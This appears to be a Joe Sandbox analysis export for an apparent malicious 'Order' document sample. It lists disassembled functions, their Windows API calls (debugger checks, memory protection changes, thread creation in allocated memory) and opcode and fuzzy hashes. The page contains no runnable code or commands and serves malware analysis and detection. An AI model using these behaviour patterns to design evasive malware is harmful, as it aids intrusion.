Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction ID: fb99fa3189b7cf6fe02a1e9cca191fa87ce96732a0e011a83902eecb09c11a36
Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
Instruction Fuzzy Hash: 08E012A574179146EA24697B7E44EB313CCCF14355B54081FB459E7646CF2CF84085EC

Function 00402322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 004022A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME), ref: 00402303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 004025A1
CoInitialize.OLE32(00000000), ref: 00402618
CloseHandle.KERNEL32(00000000), ref: 0047503A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 8a4b1e56580051f76ee24fd406250ec50a017d9c58e81692b5d0feeee1738c61
Instruction ID: 467a5c185213abbeff6f391a9cbeb45029f0b355c3efb32a313897462e65bf95
Opcode Fuzzy Hash: 8a4b1e56580051f76ee24fd406250ec50a017d9c58e81692b5d0feeee1738c61
Instruction Fuzzy Hash: 3F71B2B89012818BD384EF5AA994D95BBA4FB5B34879081BFD50AE72B3CB784414CF1C

Function 00403A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00403A73

Part of subcall function 00421405: __lock.LIBCMT ref: 0042140B

Part of subcall function 00403ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00403AF3
Part of subcall function 00403ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00403B08

Part of subcall function 00403D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00403AA3,?), ref: 00403D45
Part of subcall function 00403D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00403AA3,?), ref: 00403D57
Part of subcall function 00403D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C1148,004C1130,?,?,?,?,00403AA3,?), ref: 00403DC8
Part of subcall function 00403D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00403AA3,?), ref: 00403E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00403AB3

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: 083c9a419650eb7b3c487a3d42e90ae60b002b2ca7067078e9a128b45e1d4eb7
Instruction ID: 5a1e6fac7f7e4f5efe05a10f66e6517c88bf61964affef9997ff0f491c4f9aa6
Opcode Fuzzy Hash: 083c9a419650eb7b3c487a3d42e90ae60b002b2ca7067078e9a128b45e1d4eb7
Instruction Fuzzy Hash: 6911AC719043409FC300EF2AE945D0EBBE9EF95310F00892FF589832B2DBB49591CB9A

Function 00BE5A3B Relevance: 3.1, APIs: 2, Instructions: 59threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00BE55C0,?,00000000,00000000), ref: 00BE5A51
RtlExitUserThread.NTDLL(00000000), ref: 00BE5B11

Memory Dump Source

Source File: 00000000.00000002.1694228884.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Thread$CreateExitUser
String ID:
API String ID: 4108186749-0
Opcode ID: f50c6f9448185400bfedcdcdaa0f7f918231404c16092c851c24d4d5f6971386
Instruction ID: 329f6bc946eec422fccfc36eed36cc0128640bf5930a780fc7995e90fef6f437
Opcode Fuzzy Hash: f50c6f9448185400bfedcdcdaa0f7f918231404c16092c851c24d4d5f6971386
Instruction Fuzzy Hash: 8211371550DBC14ED7378B2A4865766AFE09F63738F2903DAD4908E1E3D3A95D0893A3

Function 0042E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0042EA29
__close_nolock.LIBCMT ref: 0042EA42

Part of subcall function 00427BDA: __getptd_noexit.LIBCMT ref: 00427BDA

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 8322a7b743970971fcc84277e3b8d07b70dffa53242504ad88308bd68288346b
Instruction ID: 2416ae91324a54d1ce8793c95f0e759c3b4c3b44b30ce6d703663dc6d154f00d
Opcode Fuzzy Hash: 8322a7b743970971fcc84277e3b8d07b70dffa53242504ad88308bd68288346b
Instruction Fuzzy Hash: 0F11C6B2B056708AD711BFA6F84175D3A506F82339FA6438BE4205F1E2C7BC9C4186AD

Function 0041F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0042395C: __FF_MSGBANNER.LIBCMT ref: 00423973
Part of subcall function 0042395C: __NMSG_WRITE.LIBCMT ref: 0042397A
Part of subcall function 0042395C: RtlAllocateHeap.NTDLL(00CC0000,00000000,00000001,00000001,00000000,?,?,0041F507,?,0000000E), ref: 0042399F

std::exception::exception.LIBCMT ref: 0041F51E
__CxxThrowException@8.LIBCMT ref: 0041F533

Part of subcall function 00426805: RaiseException.KERNEL32(?,?,0000000E,004B6A30,?,?,?,0041F538,0000000E,004B6A30,?,00000001), ref: 00426856

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 07ae70237271e5845d7a5d046d1afbaef3a230bfd21fc86a28fc04616e9042e9
Instruction ID: 7ad46e9193426c8d339f918b5cf2d99cac8a9eaef2833add56b360256c533eb5
Opcode Fuzzy Hash: 07ae70237271e5845d7a5d046d1afbaef3a230bfd21fc86a28fc04616e9042e9
Instruction Fuzzy Hash: 6EF0A43160422D67DB04BF9DE8019DF77A89F01358FB0842BF90992191DBB8A6C597AD

Function 004235E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__lock_file.LIBCMT ref: 00423629

Part of subcall function 00424E1C: __lock.LIBCMT ref: 00424E3F

__fclose_nolock.LIBCMT ref: 00423634

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: d1a9e36aabfa746b74cf3c7e94aba650e42a83fbd7dd24189ef5f7023581c49c
Instruction ID: e0ac56d962211a67bba08426c2dd1c536cda0567d662fd5b2e2ebd868d4dc1e9
Opcode Fuzzy Hash: d1a9e36aabfa746b74cf3c7e94aba650e42a83fbd7dd24189ef5f7023581c49c
Instruction Fuzzy Hash: 7AF09671B01234AAD721AF66A80276E7AB45F41339FA6814FE454AB3C1CB7C8A019A5D

Function 00BE5D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00BE5D6D

Memory Dump Source

Source File: 00000000.00000002.1694228884.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 89debf944f24a068109d173f6f8bc051edbc125a0ae2184149fa48c7a710280a
Instruction ID: cab75fcd55a4dfa98340914a58a024d32375c636e0eb6bf699282951f59611a8
Opcode Fuzzy Hash: 89debf944f24a068109d173f6f8bc051edbc125a0ae2184149fa48c7a710280a
Instruction Fuzzy Hash: 93F03065A04FD0EADA3F136BAD4EF752AD0D71272DF4CD1F5A241990B28B951C16C502

Function 00BE5F10 Relevance: 1.7, APIs: 1, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694228884.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7d040b8073a87f7f9c58f06369f3716d304014627a76c808eadc37209e935fa
Instruction ID: dfada92bea729aee5da13625d045dd95e17631a1db8ebdcf9cd0ed4d450f5423
Opcode Fuzzy Hash: f7d040b8073a87f7f9c58f06369f3716d304014627a76c808eadc37209e935fa
Instruction Fuzzy Hash: A171D02180CFD08AC73A462B8894675BBE0EB723ACF4D86DAD0958B1A3D7719D449392

Function 0040E8A0 Relevance: 1.7, APIs: 1, Instructions: 196windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0040E959

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 88f255187950cc997f75be087420acc3692357a64f7dacaed34a548e97914225
Instruction ID: fc093b3e9e10bf552c1be73b27f7c8da03df1a2de4767d2e187352050fe1c2e5
Opcode Fuzzy Hash: 88f255187950cc997f75be087420acc3692357a64f7dacaed34a548e97914225
Instruction Fuzzy Hash: 2F71D6719083848FEB25CF25D44479A7BD0EB55308F0C897FD8899F3A2D7B99885CB4A

Function 00DFA5B8 Relevance: 1.7, APIs: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 00DF9E28: GetFileAttributesW.KERNEL32(?), ref: 00DF9E33

CreateDirectoryW.KERNEL32(?,00000000), ref: 00DFA6F9

Memory Dump Source

Source File: 00000000.00000002.1695136814.0000000000DF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DF9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_df9000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 09c059c00337a99c9a71f5cb9cc79b6e962d7e6a3e6be9bab966866782551e61
Instruction ID: f431d2602053d1b62d8f12e97657734f90c975a1993d505acaa2cef5e7f5eb47
Opcode Fuzzy Hash: 09c059c00337a99c9a71f5cb9cc79b6e962d7e6a3e6be9bab966866782551e61
Instruction Fuzzy Hash: 58517171A1020C96EF14EFA4C854BFE7379EF58700F008569B60DEB290EB799B45CB66

Function 00422957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00422A0B

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: 8f2a899de28b9b8ac1dd69c8cddf2acff934126b4057793d23fbf70436a2ef8e
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: EB41E870700726BFDB288EA9E68056F77A6AF45350F54852FE845C7640DAF8DD818B48

Function 00BE6490 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1694228884.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d751bf6ec19995e404252a3065ba437e4bd3e3fac84f6cd883237f25efd1fc18
Instruction ID: 60d68940a032e584fc808d99a724a7cfaafedb82e2cbe9d17b94ef508011b39d
Opcode Fuzzy Hash: d751bf6ec19995e404252a3065ba437e4bd3e3fac84f6cd883237f25efd1fc18
Instruction Fuzzy Hash: 2631C6619083D08AC7368B6BC484339BBF0EBB27E4F4896DAD1859A2E3D7758C04D753

Function 0041ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32 ref: 0041EDC7

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: e1e9453dff8cdd36c9b53572e70871791048215458511bd1f5cf1fdffc6e0534
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: B231FC78A00106DBC718DF1AE4809A9F7B6FF49340B6486A6E809CB355DB34EDC1CB85

Function 004041A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00404214: FreeLibrary.KERNEL32(00000000,?), ref: 00404247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004039FE,?,00000001), ref: 004041DB

Part of subcall function 00404291: FreeLibrary.KERNEL32(00000000), ref: 004042C4

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: bdc7bc1839d97ab04ecd5fd31589a7babd8fc0f1fafcf12f2688e08ee6139e99
Instruction ID: 1f80cfd2d09e1638bed56b013e730591200b4cfe8bff1834d2c9f7d5b423193b
Opcode Fuzzy Hash: bdc7bc1839d97ab04ecd5fd31589a7babd8fc0f1fafcf12f2688e08ee6139e99
Instruction Fuzzy Hash: A011C871700206AADB10BB71DC06B9E77A99FC0748F10847EF656B61C1DB789A059B58

Function 0042AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0042AFC0

Part of subcall function 00427BDA: __getptd_noexit.LIBCMT ref: 00427BDA

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 11c00ffc3f7456b8b7639cd1d23e0bdfdcc4dcbab5d0a08258685fbd082b0570
Instruction ID: 72f555c6501e1ce87cd012baef782597da69394b83e16657c689296a690b0a37
Opcode Fuzzy Hash: 11c00ffc3f7456b8b7639cd1d23e0bdfdcc4dcbab5d0a08258685fbd082b0570
Instruction Fuzzy Hash: B711B672B046308FD7127FA5B90175A7B609F42339F96424AE4705B1E2CBBC9D008BAE

Function 00BE6086 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32 ref: 00BE608C

Memory Dump Source

Source File: 00000000.00000002.1694228884.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3380b7b9765b0ff5c5e2d96bbc177d200fd20b1def2a82aa7c9d31490ac72bf8
Instruction ID: f5c11be64aca5c24a8551e305fc975d2b18d876bb76dd90e09b6144605c58381
Opcode Fuzzy Hash: 3380b7b9765b0ff5c5e2d96bbc177d200fd20b1def2a82aa7c9d31490ac72bf8
Instruction Fuzzy Hash: FF01846180D3D09EC7368B2784543357BF4EF763A4F0996DAA185971A3D7709C04D793

Function 004039DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction ID: e462a9ed68780897a26be5b7c37f438fac53c332684aae35b8fe6951bdcf7267
Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
Instruction Fuzzy Hash: 9D018671500109EECF04EF65C8918FEBF78AF20344F00806FB515A71E5EA349A49DF68

Function 00422AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00422AED

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 75817c05e41aff18e0b5dc307dc2a24adc95069273b999b4acbc6a7d50f9e70f
Instruction ID: 5589abf0bb1310eb904447484f268859338ac04dd37c0e0a6a4a15a0a52f55d4
Opcode Fuzzy Hash: 75817c05e41aff18e0b5dc307dc2a24adc95069273b999b4acbc6a7d50f9e70f
Instruction Fuzzy Hash: 3CF0C231700225BADF21AF76AD023DF3AA1BF40318F96442BB4149B191C7BC8A52DB59

Function 00404252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,004039FE,?,00000001), ref: 00404286

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
